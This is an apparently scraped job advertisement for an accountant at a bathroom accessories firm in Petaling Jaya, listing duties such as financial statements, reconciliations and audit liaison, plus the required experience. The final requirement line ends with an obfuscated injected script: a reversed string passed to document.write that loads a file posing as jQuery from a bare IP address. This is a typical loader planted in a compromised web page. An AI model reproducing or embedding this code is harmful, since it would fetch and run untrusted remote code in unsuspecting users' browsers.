Location : PJU 6A, Petaling Jaya
Industry : Bathroom accessories
– Prepare draft financial statement for year-end audit
– Prepare full set of financial statements and monthly management reports.
– Responsible for the reconciliations and ensure unreconciled items are cleared on timely basis.
– Ability to lead, coach and supervise subordinates
– Monitoring accounting process and procedure are in compliance with company policies.
– Ensure that the daily transactions are accounted on timely basis.
– To liaise with auditors and external parties. liaise with auditors, tax agent, company secretary or bankers and regulatory authorities
– Assist and coordinate for year-end financial audit
– Assist in ad-hoc assignment as and when necessary
– Preferably with Degree in Accountancy or any relevant discipline.
– At least 3 year(s) of related working experience preferably in the audit background.
– Computer literate with strong proficiency in Ms Word and Excel. Knowledge in Microsoft Navision accounting software will be an advantage.
– Able to lead, manage and supervise the accounting function of a team of accounting staff.
– Strong in communication and interpersonal skills. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))